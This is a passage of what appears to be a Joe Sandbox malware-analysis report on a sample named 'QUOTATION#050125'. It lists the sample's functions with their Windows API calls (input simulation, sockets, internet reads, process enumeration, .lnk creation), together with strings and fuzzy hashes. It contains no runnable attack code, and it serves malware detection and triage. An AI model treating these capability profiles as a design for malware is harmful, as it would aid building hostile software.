FindClose.KERNEL32(00000000), ref: 004ED4A1

Strings

\*.*, xrefs: 004ED3F2

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 9220008c087cf5f42d4ffc858de0fd06999fc114759e6f7109fd29a313fb8921
Instruction ID: 395b329890f404773ba460a9c02d676cc05013fbc7f26731bd790c09b08c6c86
Opcode Fuzzy Hash: 9220008c087cf5f42d4ffc858de0fd06999fc114759e6f7109fd29a313fb8921
Instruction Fuzzy Hash: 663190714083819BC301FF61C8518AFB7A8AFA1309F444E1FF4D152191EB39AA09D76B

Function 005022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 005022E8

Part of subcall function 004FE4EC: GetWindowRect.USER32(?,?), ref: 004FE504

GetDesktopWindow.USER32 ref: 00502312
GetWindowRect.USER32(00000000), ref: 00502319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00502355
GetCursorPos.USER32(?), ref: 00502381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005023DF

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: b4be9e8fe0ee4b04cdd4b1ab1d6d4faafbccc4bd9cd821c942e9dbb09f50fdb8
Instruction ID: 6d4ea65c15d6e4dc356891fbd2bf0ce993d6b1864b5efc4c0961fdc2c37a26f8
Opcode Fuzzy Hash: b4be9e8fe0ee4b04cdd4b1ab1d6d4faafbccc4bd9cd821c942e9dbb09f50fdb8
Instruction Fuzzy Hash: C231CD72504315ABC720DF15C849B9BBBEAFF84314F00491EF98597191DB35EA08CB92

Function 004F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 004F9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 004F9C8B

Part of subcall function 004F3874: GetInputState.USER32 ref: 004F38CB
Part of subcall function 004F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004F3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 004F9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 004F9C75

Strings

*.*, xrefs: 004F9B5D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
String ID: *.*
API String ID: 1927845040-438819550
Opcode ID: 2d15e510171b6f52df5e5bef243383e5f400ccb30c7c21aaa9476c07babfdb25
Instruction ID: 8d4ea062cd1e5e07e693f8c07342e2be48385f847bd363bcd579cafa67d5d879
Opcode Fuzzy Hash: 2d15e510171b6f52df5e5bef243383e5f400ccb30c7c21aaa9476c07babfdb25
Instruction Fuzzy Hash: 9141AE7184020E9BDF14EF65C849BEE7BB4FF05304F14405AE905A2291EB399E84CF69

Function 00488060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 004883E8
VUUU, xrefs: 004883FA
55249205525920552e920552a92055259205522920552c920552692055249205525920552e920552b92055259205524920552c920552692055249205525920552e, xrefs: 0048839B, 004883A6
VUUU, xrefs: 0048843C
ERCP, xrefs: 0048813C
VUUU, xrefs: 004C5DF0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: 55249205525920552e920552a92055259205522920552c920552692055249205525920552e920552b92055259205524920552c920552692055249205525920552e$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1892989977
Opcode ID: 9a9677ef123743ada447891c9c9dce68ec9ec7d87cb3449600829dab2e07293b
Instruction ID: 496b1b080577efd9f14712600b2d932105a07698eba43441077b147143c06c98
Opcode Fuzzy Hash: 9a9677ef123743ada447891c9c9dce68ec9ec7d87cb3449600829dab2e07293b
Instruction Fuzzy Hash: A5A29D74A0021ACBDF64DF58C940BAEB7B1BF54310F6585AFD815A7380EB38AD81CB59

Function 0049997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00499BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00499BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00499A4E
GetSysColor.USER32(0000000F), ref: 00499B23
SetBkColor.GDI32(?,00000000), ref: 00499B36

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 5d75abef99ca57f24bfc1adf4117e1d918f15ba00e7a8f17e248413650c84d9d
Instruction ID: 7a0a8eefd8c6779136e3e224deb159a3c1d24d62d4dae501c8e4b4d2019b5438
Opcode Fuzzy Hash: 5d75abef99ca57f24bfc1adf4117e1d918f15ba00e7a8f17e248413650c84d9d
Instruction Fuzzy Hash: EDA11B70108544BFEF24AA2D8C68EBB2E9DEB86310B15412FF502C6791DA2DDD42D27F

Function 00501806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0050304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0050307A

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0050185D
WSAGetLastError.WSOCK32 ref: 00501884
bind.WSOCK32(00000000,?,00000010), ref: 005018DB
WSAGetLastError.WSOCK32 ref: 005018E6
closesocket.WSOCK32(00000000), ref: 00501915

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: 8507b2000fd1de6f533568fc4dabc84076d748c8b4146989b342572c8cf9cc86
Instruction ID: b5f1766e36460d388186fa3fe835ed990986f1eae79495889fc7a24f36106f1f
Opcode Fuzzy Hash: 8507b2000fd1de6f533568fc4dabc84076d748c8b4146989b342572c8cf9cc86
Instruction Fuzzy Hash: FB51A071A40200AFEB10AF24C886F6E7BA5AF44718F18849DFA165F2C3C675AD418BA5

Function 00511C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00511CC0
IsWindowEnabled.USER32 ref: 00511CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00511CDB
IsIconic.USER32 ref: 00511CE9
IsZoomed.USER32 ref: 00511CF7

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: aa79f725306caa1cc7b6a8f8310902418baccc9c691f409f6dce35422fe1bb6c
Instruction ID: 1832de177ac18bf8369eb1f4a3527ae9842cf3e2dab55c64a93a8c5f76ec0e73
Opcode Fuzzy Hash: aa79f725306caa1cc7b6a8f8310902418baccc9c691f409f6dce35422fe1bb6c
Instruction Fuzzy Hash: D621B431780A015FE7209F2AD884B9A7FA5FF95318F19849CE9468B251CB71DC82CBD8

Function 004F648E Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 004F6639
CoCreateInstance.OLE32(0051FCF8,00000000,00000001,0051FB68,?), ref: 004F6650
CoUninitialize.OLE32 ref: 004F68D4

Strings

.lnk, xrefs: 004F64BA, 004F6524, 004F65E0

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 63ae5c0e6e833065dd5b5a6e7b94c3297485c681090ce0a6336c7520370a9245
Instruction ID: 3e6010583377453f942b56fa9e2f328265874e7382ba0c2ffea940dc64e1f626
Opcode Fuzzy Hash: 63ae5c0e6e833065dd5b5a6e7b94c3297485c681090ce0a6336c7520370a9245
Instruction Fuzzy Hash: 23D17A71508201AFD304EF25C88196FB7E8FF94308F14492EF6959B291DB35ED09CBA6

Function 004E8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 004E82AA

Strings

(, xrefs: 004E82F0
tbT, xrefs: 004E84F4
|, xrefs: 004E82DA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: lstrlen
String ID: ($tbT$|
API String ID: 1659193697-2744175871
Opcode ID: b42d2213c5d2709ec677b4ff742ec0596dab933ef8966dd2864c5728153ee882
Instruction ID: 6a61ab2038ef59b15847db68230f797f26a53907a537681187390564459b3725
Opcode Fuzzy Hash: b42d2213c5d2709ec677b4ff742ec0596dab933ef8966dd2864c5728153ee882
Instruction Fuzzy Hash: B2323774A007459FCB28CF5AC480A6AB7F0FF48710B15C56EE89ADB7A1EB74E941CB44

Function 004BE4FF Relevance: 6.4, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

Strings

1#SNAN, xrefs: 004BF844
1#INF, xrefs: 004BF852
1#QNAN, xrefs: 004BF84B
1#IND, xrefs: 004BF83D

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID:
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 0-2761157908
Opcode ID: b04538427bf76ad06c334d5230556168f090b266dd6c2da5c03e8c4aaf3959e8
Instruction ID: 57dfc2d808eedb9952f2f98c8ad13f9484fb0bb6e4c6f79ee2281b95e032d6ac
Opcode Fuzzy Hash: b04538427bf76ad06c334d5230556168f090b266dd6c2da5c03e8c4aaf3959e8
Instruction Fuzzy Hash: 53C26971E086288FDB25CE29DD407EAB7B5EB89304F1441EBD80DE7241E778AE858F54

Function 0050A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0050A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0050A6BA
Process32NextW.KERNEL32(00000000,?), ref: 0050A79C
CloseHandle.KERNEL32(00000000), ref: 0050A7AB

Part of subcall function 0049CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,004C3303,?), ref: 0049CE8A

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
String ID:
API String ID: 2000298826-0
Opcode ID: 521cd95453eb3b4f1e939fab886db7953247fb4d5e608738b609abeff24059df
Instruction ID: ccc414b10f6105b5123656de9cd703d7a4b3f7a04b2044b57ed211e61914dff4
Opcode Fuzzy Hash: 521cd95453eb3b4f1e939fab886db7953247fb4d5e608738b609abeff24059df
Instruction Fuzzy Hash: 8B516D71508301AFD710EF25D886A6FBBE8FF89758F00892EF58597291EB34D904CB96

Function 004EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004EAAAC
SetKeyboardState.USER32(00000080), ref: 004EAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004EAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004EAB88

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 043506e184fed05f16598e1bb74e19db1007ab83beca9f12bb85245082827f98
Instruction ID: 6195e9f6a14169c08357d2424ef23b2c25e36934b93d353810425a8960ef02d7
Opcode Fuzzy Hash: 043506e184fed05f16598e1bb74e19db1007ab83beca9f12bb85245082827f98
Instruction Fuzzy Hash: F9312E30A40284AEFB30CB66CC057FB7BA6AB54312F04421BF281952D0D37DB965D75B

Function 004FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 004FCE89
GetLastError.KERNEL32(?,00000000), ref: 004FCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 004FCEFE

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 7cb57f23b3b23632618ea8127e75f615deddb006ac0b27ad9a501d229b3140cf
Instruction ID: d90db22c5783d322ac73c3377a7e95022cd0970708aa9ecd63234af675b6cec5
Opcode Fuzzy Hash: 7cb57f23b3b23632618ea8127e75f615deddb006ac0b27ad9a501d229b3140cf
Instruction Fuzzy Hash: CE21AE7154030D9BD720CF65CA84BA7BBF8EF60318F10841FE65692291E779EA099B68

Function 004A083F Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004A084B
IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 004A0916
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 004A0936
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 004A0940

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 769c853f1cf277f7e240120d5a047ccc2ac26a815a837c3ba34024943b12b272
Instruction ID: 679748bc3af4222487e943cc6bd2068bbe59b4cb13a65e0115e5004ce87b8723
Opcode Fuzzy Hash: 769c853f1cf277f7e240120d5a047ccc2ac26a815a837c3ba34024943b12b272
Instruction Fuzzy Hash: 51314C75D4131C9BDF10DFA5D989BCDBBB8AF18304F1041EAE40DAB250EB759A849F48

Function 004EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,004C5222), ref: 004EDBCE
GetFileAttributesW.KERNEL32(?), ref: 004EDBDD
FindFirstFileW.KERNEL32(?,?), ref: 004EDBEE
FindClose.KERNEL32(00000000), ref: 004EDBFA

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 895c95cb06b1be16caa36192cf411623843fedb26c7040513df6ccc67420f002
Instruction ID: abdc7caef0c2bd343c3b2ea220824c2779c7f7d50ed789cb825cea020a9e48be
Opcode Fuzzy Hash: 895c95cb06b1be16caa36192cf411623843fedb26c7040513df6ccc67420f002
Instruction Fuzzy Hash: 85F0E530C909106782206B7CAC0D8EB3B6C9F41376B208703F876C21F0EBB95D69D6DA

Function 004A0C21 Relevance: 6.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,004A0D40,0051FE34,00000017), ref: 004A0C26
UnhandledExceptionFilter.KERNEL32(0051FE34,?,004A0D40,0051FE34,00000017), ref: 004A0C2F
GetCurrentProcess.KERNEL32(C0000409,?,004A0D40,0051FE34,00000017), ref: 004A0C3A
TerminateProcess.KERNEL32(00000000,?,004A0D40,0051FE34,00000017), ref: 004A0C41

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 242aab1ce254027caf14636980be521d3000316579263ba86fb8d402ae0db3f2
Instruction ID: 9861d8aad1a298271bdbb1a0d2f72becd5dc015ecff21473bb1be0c761302d17
Opcode Fuzzy Hash: 242aab1ce254027caf14636980be521d3000316579263ba86fb8d402ae0db3f2
Instruction Fuzzy Hash: 8DD0E9710C4208ABD6012BE1EC0DA997F68AB19656F04C810F719C5461DB725555AB95

Function 004BB952 Relevance: 4.9, APIs: 3, Instructions: 370timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00523700), ref: 004BBB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0055121C,000000FF,00000000,0000003F,00000000,?,?), ref: 004BBC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00551270,000000FF,?,0000003F,00000000,?), ref: 004BBC36

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 1904278450-0
Opcode ID: 8bd97566f666a64d560a4b4d7a0f349cdab1a7cf4b1e495341f46b180967ecc6
Instruction ID: 6ffa4785bc8357d6afd1beefaba91a1c8d495df322a2948b5fbdd886340a707c
Opcode Fuzzy Hash: 8bd97566f666a64d560a4b4d7a0f349cdab1a7cf4b1e495341f46b180967ecc6
Instruction Fuzzy Hash: EFC11275904204AACB20DF6A8C51BEEBFB8EF55314F14419FE89497351EBB89E01C7B8

Function 004F5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004F5CC1
FindNextFileW.KERNEL32(00000000,?), ref: 004F5D17
FindClose.KERNEL32(?), ref: 004F5D5F

Memory Dump Source

Source File: 00000000.00000002.2051345478.0000000000481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00480000, based on PE: true

Associated: 00000000.00000002.2051317606.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.000000000051C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051488447.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051576391.000000000054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2051607617.0000000000554000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_480000_QUOTATION#050125.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 5032d66adf4314ed017dea02941e1c8ffdecc9987d4d1794798872754592b287
Instruction ID: 076e5075acaa7a3d801ffd2215a37c93d159a18dac4c296b9be8b06f40f05b4b
Opcode Fuzzy Hash: 5032d66adf4314ed017dea02941e1c8ffdecc9987d4d1794798872754592b287
